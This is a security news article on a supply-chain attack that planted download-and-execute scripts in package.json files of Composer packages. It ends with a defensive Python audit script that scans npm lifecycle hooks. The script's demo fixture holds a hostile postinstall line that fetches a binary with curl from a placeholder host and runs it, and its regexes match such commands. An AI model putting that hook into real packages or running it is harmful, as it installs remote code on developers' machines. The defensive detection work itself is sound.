Unidentified threat actors targeted the Packagist repository this month, infecting eight Composer packages with malicious scripts [1].

This attack demonstrates a sophisticated method of bypassing standard PHP security checks by targeting JavaScript configuration files within PHP ecosystems. By exploiting the intersection of different package managers, attackers can execute unauthorized code on developer machines and within automated CI/CD pipelines.

The attackers inserted malicious scripts into the `package.json` files of the compromised packages [1]. These scripts were designed to download and execute a Linux binary hosted on a GitHub Releases URL [1]. This allowed the threat actors to run arbitrary code on victim machines during the installation process.

"Although the affected packages were all Composer packages, the malicious code was not added to composer.json," Socket said. "Instead, it was inserted into package.json, targeting projects that ship JavaScript."

This incident occurs amid a broader surge of supply-chain compromises across various registries. Separate attacks this month included the compromise of 42 npm packages in a TanStack attack [2] and over 320 npm packages hit by a Mini Shai-Hulud attack [3]. Furthermore, a related breach reportedly impacted 3,800 internal GitHub repositories [4].

Security researchers noted that the use of GitHub Releases to host the binary helped the malware evade some detection systems by leveraging a trusted domain. The attack specifically targeted the build and deployment phase of software development, the point where dependencies are resolved and installed.


The targeting of `package.json` within a Composer-managed environment highlights a growing trend of 'cross-ecosystem' attacks. By placing malicious code in a file that the primary language manager (Composer) ignores but a secondary tool (npm) executes, attackers create a blind spot for many security scanners. This increases the risk for full-stack projects that rely on multiple package managers, as a malicious dependency pulled in through one of them can compromise the entire development environment.
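One defender-side check that this blind spot calls for, written here as an added example and not taken from the article or from Socket's research: audit every `package.json` under a Composer project, `vendor/` included, for npm lifecycle hooks that fetch or execute remote code, since those files are installed by Composer but run by npm. The package names, paths and the `example.invalid` URL are constructed for the demo.

```python
import json
import re
import tempfile
from pathlib import Path

# npm lifecycle hooks that run automatically on `npm install`; Composer never reads them.
LIFECYCLE_HOOKS = {"preinstall", "install", "postinstall", "prepare"}
# Heuristics for a download-then-execute one-liner (constructed for this example).
DOWNLOAD_RE = re.compile(r"\b(curl|wget)\b")
URL_RE = re.compile(r"https?://[^\s'\"]+")
EXEC_RE = re.compile(r"(chmod\s+\+x|\|\s*(ba)?sh\b|&&\s*\./)")

def audit_package_json(path):
    """Return findings for lifecycle hooks in one package.json that fetch or run remote code."""
    data = json.loads(Path(path).read_text(encoding="utf-8"))
    findings = []
    for hook, cmd in data.get("scripts", {}).items():
        if hook not in LIFECYCLE_HOOKS or not isinstance(cmd, str):
            continue
        urls = URL_RE.findall(cmd)
        downloads = bool(DOWNLOAD_RE.search(cmd))
        executes = bool(EXEC_RE.search(cmd))
        if urls or downloads or executes:
            findings.append({"file": str(path), "hook": hook, "command": cmd,
                             "urls": urls, "downloads": downloads, "executes": executes})
    return findings

def audit_tree(root):
    """Walk a project tree, vendor/ included, for every package.json npm might execute."""
    findings = []
    for p in Path(root).rglob("package.json"):
        try:
            findings.extend(audit_package_json(p))
        except (json.JSONDecodeError, OSError):
            continue  # unreadable or malformed file; report separately if desired
    return findings

def demo():
    """Constructed vendor/ tree: one clean package and one with a hostile postinstall hook."""
    root = Path(tempfile.mkdtemp())
    clean = root / "vendor" / "acme" / "ui-kit"
    clean.mkdir(parents=True)
    (clean / "package.json").write_text(json.dumps(
        {"name": "ui-kit", "scripts": {"build": "vite build", "test": "vitest"}}))
    bad = root / "vendor" / "acme" / "form-widgets"
    bad.mkdir(parents=True)
    # Placeholder URL (example.invalid), not a real indicator from the incident.
    (bad / "package.json").write_text(json.dumps({"name": "form-widgets", "scripts": {
        "postinstall": "curl -sL https://example.invalid/releases/v1/bin -o /tmp/x && chmod +x /tmp/x && /tmp/x"}}))
    return audit_tree(root)
```

Running the audit in CI before any `npm install` step, and installing with `npm ci --ignore-scripts` so lifecycle hooks never execute unreviewed, closes the gap on the pipeline side as well.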